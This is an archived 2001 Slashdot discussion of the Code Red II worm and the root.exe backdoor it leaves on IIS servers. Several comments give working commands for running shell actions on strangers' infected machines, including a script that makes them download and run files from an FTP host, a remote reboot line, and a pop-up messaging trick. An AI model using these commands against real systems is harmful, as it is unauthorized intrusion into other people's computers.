Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 


Forgot your password?
Close
typodupeerror
×
Bug

Code Red II: Shells for the Taking 602

Posted by CmdrTaco from the it-keeps-getting-more-and-more-comical dept.
sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accesible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?
This discussion has been archived. No new comments can be posted.

Code Red II: Shells for the Taking More

Code Red II: Shells for the Taking

Comments Filter:
  • I've created a script that parses my server logs for code red hits, then prints up a webpage with each ip linked to "http://[ipaddy]/scripts/root.exe?/c+dir+c:\". It's amazing how many people's computers are just wide open. It's really easy to create, rename, delete, or display just about any file on the poor saps computer. For example, "http://[ipaddy]/scripts/root.exe?/c+echo+IIS+SUCK S!+>+c:\CODEREDATETHELASTOFYOURCORNFLAKES.txt".

    I mean, errr, hypothetically it would be possible to do such things, uhhh yeah.
  • You might want to consider submitting your apache logs to dshield. This will help keep track of the extent of this problem as well as help to analyze where it may have originated. If the dshield folks can correlate the earliest attacks of the latest variant, they have a chance at finding where this thing originated.

    Submissions can be made by following these instructions [dshield.org].

  • Bandwidth (Score:4, Insightful)

    by nick_davison ( 217681 ) on Sunday August 05, 2001 @04:01PM (#2110965)
    But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?

    I kind of find myself wondering, which wastes more bandwidth: the virus itself of all of the discussion about the virus?

    I'm assuming the virus wastes vastly more. That said, take a look at the way every news site is covering it, the large images they have accompanying the stories and the vast numbers of people reading them because MSN messenger tells them it's important. I don't know if there is any way of measuring the bandwidth wasted by each but it'd be an interesting ratio to see, if there was.

    • Re:Bandwidth (Score:4, Insightful)

      by TrixX ( 187353 ) on Sunday August 05, 2001 @09:58PM (#2163071) Journal
      The bandwidth wasted by the virus is actually wasted, and useless.

      But if all the news, the discussion and similar are useful to make sysadmins a little smarter and make them use less vulnerable servers, or at least keep security patches up to date, I think that is not "waste".

  • Killing small ISPs (Score:5, Informative)

    by Alien54 ( 180860 ) on Sunday August 05, 2001 @03:28PM (#2111249) Journal
    I know of at least one small ISP that had very serious problems this week.

    First one of the top dogs in the place sent sircam throughout the company. This was a really bad hair day.

    Then they had a separate second problem where user mail boxes flooded out crashing the mail server, among other strange things. Imagine users with DSL lines sending out multimegabyte files that bounce. Considering that most ISPs configure the drive space for mail based on average usage of users, and do not set aside the actual amount of drive space for user mail, etc. that has been promised for all users.

    BOOM!

    If this keeps happening, this is going to be bad for business in a lot of places.

    • I know of at least one small ISP that had very serious problems this week. First one of the top dogs in the place sent sircam throughout the company

      I have absolutely no sympathy for them. It's maybe understandable when someone from completely outside a computer-related field propogates a virus like that. But anyone at an ISP should know better. I don't care if they are in a non-technical position there; they still should have a basic understanding of what their company does. And the most basic understanding is all you need to not be infected.

    • Re:Killing small ISPs (Score:2, Interesting)

      by sirPaul ( 119432 )
      From small ISP bosses to world leaders and FBI agents:

      CNN story about Ukraine President getting SirCam. [cnn.com]

      Newsbytes story about FBI agent w/SirCam. [newsbytes.com]

  • I posted this to Bugtraq last night but it got rejected. :P

    Anyways, if cable modem users are seeing drastically increased ARPing, the targeting of the Code Red III variant should explain it -- hitting non-existent addresses on your subnet will cause the CMTSheadend router to ARP out to see who's got that address, you get the picture.

    At the very least, it's a good opportunity for users to see how many modems your provider has packed onto your segment. If they've packed too many on there, you can be sure the CMTS router's going to get seriously bogged down.

    I have an automated program which sends the IP addresses to the ARIS list *and* to my ISP's security department (those IP's which fall under their management) -- I wonder if ISP's are considering just dropping all packets from infected hosts, so when the customer comes to them and complains, they say "Oh, you're infected, reboot, install the patch, and we'll reconnect you." Seems that this would reduce the load on the CMTS and would be faster than trying to track down each customer individually.

    Chad Loder

    Rapid 7, Inc. - Next generation security products and services

    http://www.rapid7.com [rapid7.com]

  • try this:

    GET /scripts/root.exe?/c+echo+ren+root.exe+badrootexpl oit+>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+echo+echo+^>+root.exe+>>+fixm e.c md HTTP/1.0
    GET /scripts/root.exe?/c+echo+attrib.exe+root.exe+%u00 2Br+>>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+echo+dir+>>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+type+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+fixme.cmd HTTP/1.0

    this way it renames the old root.exe, creates a new dummy one, and write protects it so it can't be overwritten by a simple copy command.
  • Wasted? It's like airplane seats: once it's not used, it's gone forever. Not a renewable resource. If a particular pipe is 90% full as opposed to 10% full, there's very little difference.

    So unless it caused noticable congestion it makes no difference in that respect.

  • Code Red Infects Slashdot! (Score:5, Funny)

    by Mdog ( 25508 ) on Sunday August 05, 2001 @03:21PM (#2136130) Homepage
    It's gotten to the editors! It's everywhere! It causes itself to be posted multiple times per day! Hide the women and children!

  • Finger of God (Score:2, Funny)

    by LinuxHam ( 52232 )
    Time the long-awaited "Finger of God" script. Fdisk 'em!

  • File download script (Score:5, Interesting)

    by nebby ( 11637 ) on Sunday August 05, 2001 @03:54PM (#2137269) Homepage
    (Copied from the other thread, for those who are working on a way to fix this worm)

    I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.


    #!/bin/sh
    # Code Red ][ Download File script
    # Usage: dlfile.sh infectedIP filename
    #
    # Please set the $ftp and $dir values to
    # the ftp and directory of the patch and shutdown repository

    # For ftp.youhavesetup.com
    FTP="ftp%2eyouhavesetup%2ecom"
    # Directory /pub/cr
    DIR="%2fpub%2fcr"

    echo GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
    sleep 1
    echo GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
    sleep 1
    echo GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ecmd | telnet $1 80
    # Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
    sleep 1
    echo GET /scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80


    I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore :)
    • > I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.

      The idea is nice, the intention is louvable, but I believe it would be considered illegal in most countries. After all, you are actually using their machine without permission.

      The argument that you're doing this for their own good is the same one that crackers use.
      -"Oh, we're doing them a favour, showing their vulnerabilities."

      • Re:File download script (Score:3, Interesting)

        by nebby ( 11637 )
        Yeah I realize that. I'm not doing anymore "work" on this, but I figured I might as well post it. I figure I painted myself red enough on one or two win2k cable modems for one lifetime now.

        The intention isn't the same as crackers though, writing a script to patch and restart IIS not an in your face "showing their vulnerabilities" crack, it's basically a free-of-charge windows update complements of whoever runs the script. I'm not saying that it is legal, but it's definitely not a "ha ha I got rewt your windows box is insecure" crack. It a "I noticed your computer is insecure, I fixed it. Have a nice day, and don't let it happen again." crack.

        If anyone actually sat and wrote a complex script to fix these computers, I *highly* doubt that a sane judge would pound the gavel on them, especially if the good they do is significant enough and measurable. (Personally, I would *love* to see someone outside of Microsoft do this before MS gets the chance to issue a fix and once again look like the good guys even though it's their original fuck up.)
      • The idea is nice, the intention is louvable, but I believe it would be considered illegal in most countries. After all, you are actually using their machine without permission.

        Are you sure? I mean, it's not like you're cracking into people's boxes randomly to do this; only computers that try to attack your Apache server are effected. Of course, thieves have successfully sued for unsafe property for injury themselves during attempted burglaries, so who knows...

      • I believe it would be considered illegal in most countries.

        What if one were to change one's web server's main page to advertise an automated Code Red fixing service, conveniently located at http://www.example.com/default.ida?

        I suppose it probably wouldn't hold up in court, but it'd still be amusing.

      • The idea is nice, the intention is louvable, but I believe it would be considered illegal in most countries. After all, you are actually using their machine without permission.

        If it was initiated by their machine (that is, by the default.ida request), that might be questionable, though. Not that *I'd* want to test it out in court, but I wouldn't dismiss it out of hand.

    • Re:File download script (Score:2, Informative)

      by Xemu ( 50595 )
      Also, I was unable to figure out a way to get the machines to reboot or restart IIS


      Rebooting a compromised IIS server is trivial, just add this to your script

      (echo "GET /scripts/root.exe?/c+iisreset+/reboot HTTP/1.0\n\n\n\n" ; sleep 5) | telnet $1 80

      or you could substitute iisreset/reboot with one iisreset/stop and one iisreset/start for less impact on the system.

  • Not a bug (Score:5, Funny)

    by Mike Schiraldi ( 18296 ) on Sunday August 05, 2001 @03:23PM (#2137705) Homepage Journal
    I've always wanted to be able to telnet into my Windows box. Where can i get this virus?
    • It's a bit slap-dash, but here's CodeRed2 Explorer [linux.org.au] for your PHP-enabled web server. No need for Telnet, even: explore Windows-land a click at a time from the comfort of your browser. (-:

      PLEASE MIRROR THIS and post your mirror URLs in reply to this message (subject Mirror of CodeRed2) since that server is a club server, low bandwidth, low budget. But very secure (Debian on Sparc and well maintained :-)

      SlashDot (the pikers )-: wouldn't let me post directly to this page.

    • ...and these machines are proud of it! (Score:4, Interesting)

      by Sun Tzu ( 41522 ) on Sunday August 05, 2001 @03:30PM (#2156464) Homepage Journal
      heheh! Not only is it a fine remote administration feature, but it's also pretty slick the way machines upgraded in this way advertise [librenix.com] their new status to everyone with a webserver on port 80.
    • of course, you know you can run your standard sshd, as well as VNC (hey, why not tunnel the former out via the latter?)

      The tempation to dig some IPs from the logs and go for a wee look around at open machines is pretty intense (not that I'll be giving in, I hasten to add - bad ethics innit?) ... and it's at times like this I wish I'd gone to the effort of finding a commandline MTA for NT, though; it's a real pain manually looking up the POC & mailing them...

    • Try this (Score:3, Informative)

      by jsse ( 254124 )
      jill.c [indenial.com]. Don't regard it as a malicious exploit, it's infact a very powerful remote administration tool. All our NT boxes are not attached to Internet so we don't worry. :)

  • huge cable modem hits (Score:3, Redundant)

    by rknop ( 240417 ) on Sunday August 05, 2001 @03:23PM (#2156373) Homepage

    I've got a cable modem on nash1.tn.home.com, and my iptables log is seeing a huge number of hits (we're talking an average of several a minute, more or less) to port 80. Since I'm not actually running a web server, I don't have the logs that tell me if this is in fact Code Red, but I suspect that's what a huge amount of this activity is.

    It's depressing, really.

    -Rob

    • If you consider that @Home's acceptable use policy [home.com] explicitely says that running servers isn't allowed... there are two interesting things to note. First, there are a lot of people running public web servers that @Home just ignores. Another thing is that it probably wouldn't be a problem legally for @Home to minimize the impact of code red by blocking port 80 traffic like they did with port 137, at least temporarily.

  • Mountain Dew: Code Red (Score:2, Informative)

    by Spaztek ( 59587 )
    Speaking of Code Red, mountain dew code red is a highly malicious blend of virus, cough syroupe, and caffeine. All are bad except caffeine. Just like this virus, all are bad on windows machines, except those which arent windows machines. I guess linux is like the caffeine of all soda. The good parts :-)

  • The Breaking Point (Score:5, Insightful)

    by tbo ( 35008 ) on Sunday August 05, 2001 @03:34PM (#2156412) Journal
    I think Code Red (and Sircam, which your average Joe will probably lump together with Code Red in his mind) will be the virus that breaks the camel's back. It's gotten constant publicity, it's coming back for a second round, and this time, it wants blood.

    What will happen? I don't know, but here are some possibilities:

    Revolt against Microsoft software. We'd all love for this to happen, but their PR machine is probably too good. Still, we can always hope people realize that MS bears a large part of the responsibility here.

    Lawsuit. Assuming the virus writers aren't found, the next logical targets will be Microsoft, and owners of a large number of infected hosts. Why it probably won't happen: suing Microsoft over this draws attention to the fact that your company's computer systems are insecure, and that your admins were too lazy/stupid to install the patch. Microsoft can always hide behind their patch, which was available well in advance, and claim that "everyone knows that bugs happen, and it's up to admins to keep up to date" (never mind that this contradicts their own marketing material--when has inconsistency ever stopped marketing before?). Suing somebody with a large bunch of infected hosts is also silly, since, to be infected by them, you have to be just as inept as them.

    Government Intervention. Some state governors may push silly state bills, but they'll be irrelevant. What would really get interesting is if the Feds pass some sort of laws, either making people responsible for keeping their systems secure, or defining what kind of liability software manufacturers are exposed to in these circumstances (i.e., can you sue MS? For how much?). Why it probably won't happen. With Congress and Bush on vacation, not much will get done in at least the next month, and things will probably have come to a head before then. Only if this round does serious damage (perhaps the world's biggest DDoS against some high-profile targets, like Akamai), and another generation of Code Red pops up in September (just in time to catch all those college PCs with their pirated copies of Windows 2000 Server and high bandwidth), will this become a real possibility.

    Internet Collapses. I really doubt it, I just had to say it to satisfy Cringley :-) Seriously, though, things may get slow, but I have a feeling vigilante efforts (counter-worms, Apache scripts that reboot infected attacking Win boxes, etc.) will keep this from happening.

    So, which will it be, folks? This would make a great SlashPoll.
    • So, which will it be, folks?

      None of the above.
      The two historical precedents that come to mind are:

      • The Grand Canyon midair collision on 30 June 1956
      • The sinking of the Titanic
      In both cases, technologies failed in ways that (in hindsight) were predictable and even inevitable consequences of growth beyond the their roots. In both cases, the response was moderate, incremental, and designed to preserve existing investments in these technologies. The lesson is that the "breaking point" for a widespread infrastructural technology is very hard to reach. And, like it or not, Windows is one of these technologies.

      Instead, what we'll see happen is more attention to security, taken in small steps. More people will subscribe to alert services, and they'll be willing to pay more for them. Bosses will start asking sysadmins what they've done for security today, and be more willing to sign purchase orders for security-related work. ISPs will pay a bit more attention to open ports on their home users, and some will scan their networks for known security vulnerabilities. OEMs configuring systems for naive users will discover that people will pay for a "safe out of the box" configuration, so they'll start to offer one. And so on, and so on....

      The normal state for an economically useful thing is to be stressed, but not stressed to the breaking point. This should be pretty obvious: if it's not stressed, it was uneconomically overbuilt. We are very far from the breaking point for Windows.

    • Re:The Breaking Point (Score:4, Interesting)

      by Malcontent ( 40834 ) on Sunday August 05, 2001 @04:09PM (#2120627)
      You can't sue MS (they are bigger then the govt prectically). But you can probably sue and company which uses IIS and stores your personal data. If that comapny was using IIS and they failed to patch their system then they have been criminally negligent in their duties. A few suits and all companies will drop IIS like a hot potato.
      Everybody wins.

      • yeah, i laughed when i got a port 80 hit from cust2120.EzSecureHosting.com it's apparently not as secure as they would have people think, so customer 2120 could probably sue them.

        and microsoft has the same "we make no guarantees" clauses that free software licenses have, so either the case would be dismissed, or clauses like that would be ruled illegal, which could be bad for free software, unless they only made it illegal to attach those clauses to commercial software

    • Re:The Breaking Point (Score:2, Interesting)

      by rberger ( 2481 )
      Why not a class action suit against Microsoft? Seems that would be an appropriate action since Microsoft is now officially a monopoly, end users who are recieving the SirCam files who are not Microsoft users are one good class. ISPs who do not use Microsoft servers who's networks are being floodded by Code Red and SirCam are another good class...

      And even the clueless ones who continue to use inherently defective software such as Outlook and IIS have as much right to sue MS as people who smoked for 50 years have to sue tobacco firms...

      • Does anybody remember a few months ago when everybody around Slashdot was feeling sorry for themselves because it seemed that Open Source software was getting hard hit by security problems?
        • sourceforge.com was hacked
        • themes.org was hacked
        • apache.org was hacked
        • the ramen worm
        • the lion worm
        • the knark rootkit
        Things were so bad that Microsoft felt cocky enough to make claim that open source software has "inherent security risks" [microsoft.com].

        Well, you can quite rightly laugh at Mundie now for his audacity, but it's ridiculous to start calling for lawsuits against software makers. Do you really believe there is never going to be another exploit targeting open source software? Do you want the creators of that open source software to be sued too when that happens?

        Microsoft is a big company, and it can afford lawsuits like that. But if, say, the creators of BIND were sued for an exploit, that would probably be the end of BIND. And it's unlikely anyone would be eager to write an open source replacement, with the threat of lawsuits looming over any potential open source project.

    • Sueing software makers for bugs is a "bad idea". How many open source authors are going to want to be held liable for that when they don't even get paid for their work? Not many.

    • Re:The Breaking Point (Score:3, Insightful)

      by Kris_J ( 10111 )
      You forget ICE -- the rather romantic "Intrusion Countermeasure Electronics" -- an automated response to terminate unauthorised hack attempts. I'm currently running the IIS shutdown line as specified by other /. posters for every IP address that probes me (I'm on a dymanic 56k dialup, I should not be getting HTTP requests -- I never did before CodeRed). It would probably be trivial to automate the process, and POOF! your first ICE program.
  • I can understand admins not patching when the fix first hit. The usual "Won't happen to me problem". But now? After all this press? All the news stories?

    I think the systems we're seeing infected now are either workstations with IIS installed and the user doesn't know/remember, or server with no real support staff sitting in a closet somewhere. Now the question is, will they EVER get patched?

    Someone whip up a worm that patches systems. Be like a cyberwar from the movies. How cool is that? :)

  • Securityfocus asks for IPs (Score:5, Informative)

    by mawis ( 125549 ) on Sunday August 05, 2001 @03:30PM (#2156471) Homepage
    To notify the administrators of the attacking servers you can send their IP followed by the date and time of the attack to aris-report@securityfocus.com. - Please use this format because it's a robot address. http://securityfocus.com/announcements/310 [securityfocus.com]
    • Though I feel like one about now... long night. :)

      Those are going to a shared e-mail alias. I get copies of everything, as well as a few other people. Unfortunately, because they are coming in many format types, we have to compile them by hand. But absolutely, please do send us the logs and have them in the format requested.
    • This one works for me for default apache logging options. 50 IP addresses so far. All your IIS servers are belong to me.

      grep \?XXX /var/log/apache/access.log | mawk '{ print($1 " "$4 " " $5) }' | Mail -s "Compromised machines" aris-report@securityfocus.com

    • To automatically notify webmasters of infected sites, if you have mod_perl/Apache, use this script:

      http://forum.swarthmore.edu/epigone/modperl/nehzah prerm [swarthmore.edu]

      It identifies any attempt to access '/default.ida', looks up the MX records of the remote IP, and sends a notification to postmaster@. It is not a 'hack back', just a notification email.

  • Experiment (Score:2, Interesting)

    by XBL ( 305578 )
    I am on @Home, and have an unpatched Windows 2000 Server (Warez Edition) installation. I've just turned it on a half-hour ago. Now let's see how long it takes to get the worm. If I get it, I'll post an update with the time.

    Right now my NIC is flickering like mad, yet Windows 2000 does not show these as incoming or outgoing packets. What is going on?

  • Gnu/Sircam? (Score:2, Interesting)

    by Tachys ( 445363 )
    I wanted to know would it be possible to make a similar virus for Linux using a Bash Shell.

    If not, why not?
    • Similar to Sircam? Not presently.

      MIME attachments won't have the execute permission set, which means that a script would have to be saved to disk and executed by the user with the command

      $ bash virus.sh

      Or the user would have to set the execute permissions himself:$ chmod u+x virus.sh
      $virus.sh

      Granted, a mail reader could be written to do all of this itself after the user ``clicks'' on the attachment, but I am aware of none that exist at the present time that have that ``feature''.

      Plus, since GNU/Linux (and all Unices) is a multi-user permissions based system, sircam would only be able to touch those files to which the user has read access. As long as the administrater isn't reading his mail as root, you'll never have to worry about some luser mailing his /etc/shadow to you.

      So, until Microsoft writes a port Outlook and starts certifying ``Linux Engineers'', no, there won't be a sircam for GNU/Linux.

  • CmdrTaco runs Windows (Score:3, Funny)

    by Ånubis ( 126403 ) on Sunday August 05, 2001 @04:41PM (#2162024) Homepage

    I still think sircam is more annoying since it affects every email user

    Every email user?!? CmdrTaco must run Windows. Let's get him!

    • Every email user?!? CmdrTaco must run Windows. Let's get him!

      I think the notion is that it affects non-Windows people as recipients of unwanted random files. (Code Red affects non-Windows people as port 80 hits, too, but that's relatively trivial, and unlikely for minimally-connected dialup people.)

      • I think the notion is that it affects non-Windows people as recipients of unwanted random files. (Code Red affects non-Windows people as port 80 hits, too, but that's relatively trivial, and unlikely for minimally-connected dialup people.)

        Except that the strange HTTP requests it puts out cause problems with some embedded webservers...
        • Except that the strange HTTP requests it puts out cause problems with some embedded webservers

          Yabbut that's *still* not "all of us," as with SirCam.

          Though, interestingly enough, I haven't seen SirCam. I run a mailing list server, and usually I get a nice sampling of darn near everything caught in the spamtrap... I saw Melissa from a European subscriber way in the wee hours of the morning, which was handy since my then-employer needed a sample to feed to its mail filter. And I still see Snowhite once every couple of days. But no SirCam.

          Not that I'm complaining, mind you...

  • I'm sorely tempted . . . (Score:5, Insightful)

    by Floyd Turbo ( 84609 ) on Sunday August 05, 2001 @04:51PM (#2162064) Journal
    Is there a Windows command line equivalent to "shutdown -h now", by any chance? I know I really shouldn't do it, but I'd be so sorely tempted to write a script that would shut down any infected box that scanned mine.

    The more I think about it, the more it seems like a permissible act of self defense. It does no harm to the infected box (if the worm doesn't write itself to disk, as I've read, it actually helps) and prevents the infected box from being used to perpetuate more abuse.

    Hmm . . .

    • Re:I'm sorely tempted . . . (Score:5, Insightful)

      by Greyfox ( 87712 ) on Sunday August 05, 2001 @05:15PM (#2162175) Homepage Journal
      You want this: http://support.microsoft.com/support/kb/articles/Q 202/0/13.ASP Happy little command called IISRESET. I think an IISRESET /STOP is in order...
  • So I have this log of about 100 CR2 hosts who have attacked my web server, and each of those infected hosts have probably got records of 100 other hosts that have tried to reinfect them in their logs. If I snarf all their logs, I'll have 10,000 compromised hosts that I've got root access on. Do it one more level, and I've got every compromised machine on the internet. How long until some kiddie scripts that up?



    OR, one group could patch all those infected hosts...or at least notify the admins.



    I've got a full analysis of this at http://braddock.com/cr2.html [braddock.com]

  • ...timothy and cmdr Taco both showed up to work today wearing matching golf shirts and Dockers pants. Upon further inspection, it was determined that they also had the exact same type of socks, shoes, and belts (they stopped short of comparing underoos). At some point, Hemos was quoted as saying, "You know, I think you two should talk to each other before coming in to work."
  • Set Apache up so when it sees a code red probe (get default.ida blah blah blah) telnets to that machine's port 80 and shuts down the web server.

    Extra credit: Disinfect the machine with the security patch from the MS Web Site.

    As this would be completely passive (Rather than patching the code red code) it should be slightly less dangerous than releasing a new worm to the net. And since it would affect only machines that have already been compromised, it should be slightly less ethically questionable than patching the worm code to do something new and the releasing it. I'm sure I'll get flamed for suggesting it nonetheless...

  • Aural Feedback (Score:3, Interesting)

    by Aldurn ( 187315 ) on Sunday August 05, 2001 @05:22PM (#2162208)
    I was curious just how often RedCode attacks. Sure, looking through the apache log files is nice, but it just didn't give me the sense of urgency... the quick succession at which attacks take place. So, I whipped up a quick perl script to play a noise every time I was "attacked". Needless to say, it's getting kind of annoying, but it still is incredible:

    #!/usr/bin/perl
    while(1) {
    system("cat /var/log/your-access.log | grep XXXXXXXXXXXXX | cut -d \" \" -f 1 | wc -l > attacks_b");
    $returnval = system("diff attacks_a attacks_b > /dev/null");
    if(0!=$returnval) {
    system("cp -f attacks_b attacks_a");
    system("play buzzer2.aiff &");
    }
    sleep(1);
    }

  • A Warning to Whitehats (Score:5, Informative)

    by Ms.Taken ( 324811 ) on Sunday August 05, 2001 @05:26PM (#2162230)
    Anyone working on scripts which respond to Code Red attacks by patching the originating server should read this cnet article [cnet.com], which calls that approach 'hack-back'.

    From the article:

    The FBI has dismissed using any hack-back tactic as well. "It is not something that we could consider," said spokeswoman Debbie Weierman. "It would basically be viewed as an unauthorized intrusion."

    It's not clear from the article whether such an 'unauthorized intrusion' by a private citizen would be illegal, but it might be worth thinking about before you go riding out to do battle with the Red Worm.

  • Let me make sure I understand this one.

    I grep \?XXX from /var/log/apache/access.log

    grep \?XXX /var/log/apache/access.log | mawk '{print($1) }'

    Then, for each result, I can telnet to port 80 and remote root the machine with a single get request for scripts/cmd.exe ??

    I have 45 such hits in my log files, mostly from machines at my ISP. That is truly ridiculous.

  • how can I alert these losers to the problem?

    Here's where I got:

    [root@yy-yy-yy-y-yy user]# telnet xx.x.xx.xxx 80
    Trying xx.x.xx.xxx...
    Connected to xxx-xx-x-xx-xxx.co.sprintbbd.net (xx.x.xx.xxx).
    Escape character is '^]'.
    GET /scripts/root.exe HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Sun, 05 Aug 2001 21:42:59 GMT
    Content-Type: application/octet-stream
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    c:\inetpub\scripts>
    Suggestions? (Non-destructive, please, the goal is to alert not hurt)
    • I get this. I think it means IIS is running on a desktop version of Windows (NT4WKS or W2KPro) rather than a server.

      ===

      The page cannot be displayed

      There are too many people accessing the Web site at this time.

      ---

      Please try the following:

      Click the Refresh button, or try again later.

      Open the 65.29.102.77 home page, and then look for links to the information you want.

      HTTP 403.9 - Access Forbidden: Too many users are connected

      Internet Information Services

      ---

      Technical Information (for support personnel)

      Background:

      This error can occur if the Web server is busy and cannot process your request due to heavy traffic.

      More information:

      Microsoft Support



  • I've been recording the hits of V1 and V2 from my machine since early this afternoon, thanks to a very handy Perl script provided by another Slashdot user.

    You can find the results and a link to the script here [homeip.net]

  • New Sites report on CR2 (Score:4, Informative)

    by stuccoguy ( 441799 ) on Sunday August 05, 2001 @08:00PM (#2162794)
    CNN [cnn.com] has very little to say [cnn.com] about the subject.

    MSNBC [msnbc.com] has a longer story [msnbc.com].

    Fox News [foxnews.com] has a few words [foxnews.com] to say.

    ABC [go.com] copied [go.com] the AP story.

    CBS [cbsnews.com] still seems to think the red tide is receeding [cbsnews.com].

    Meanwhile the worm has knocked on my computer's door six times since I started this post. Uh, make that seven.

  • How to send a message to the poor bastards (Score:4, Informative)

    by Brian Stretch ( 5304 ) on Sunday August 05, 2001 @09:48PM (#2163053)
    A user on grc.security (news.grc.com) suggested using the Windows "net send" command to send a pop-up message to the infected user. net.exe won't talk across the Internet, but you ought to be able to run the net.exe program on the rooted IIS box, something like:

    http://ipaddress/c/inetpub/scripts/root.exe?/c+n et +send+%25COMPUTERNAME%25+You+have+been+infected+by +the+Code+Red+II+Worm+which+attempted+to+attack+my +server

    %25COMPUTERNAME%25 translates to %COMPUTERNAME%, which returns the Windows hostname. I know that works from one of my failed attempts that gave me a reply, but with the above string, I get back a page with "Error in CGI Application" as
    the title:

    CGI Error

    The specified CGI application misbehaved by not returning a complete set
    of HTTP headers. The headers it did return are:

    and it doesn't give me any return. Can anyone verify and/or debug this? It *might* be working.

    The %USERDOMAIN% variable might be useful too, so you could send to the whole Windows domain, "Machine LUSER on DOOFUSDOMAIN is infected with Code Red II" or some such. %USERDOMAIN% is the machine name on systems on a workgroup.

Slashdot Top Deals

The use of money is all the advantage there is to having money. -- B. Franklin

Close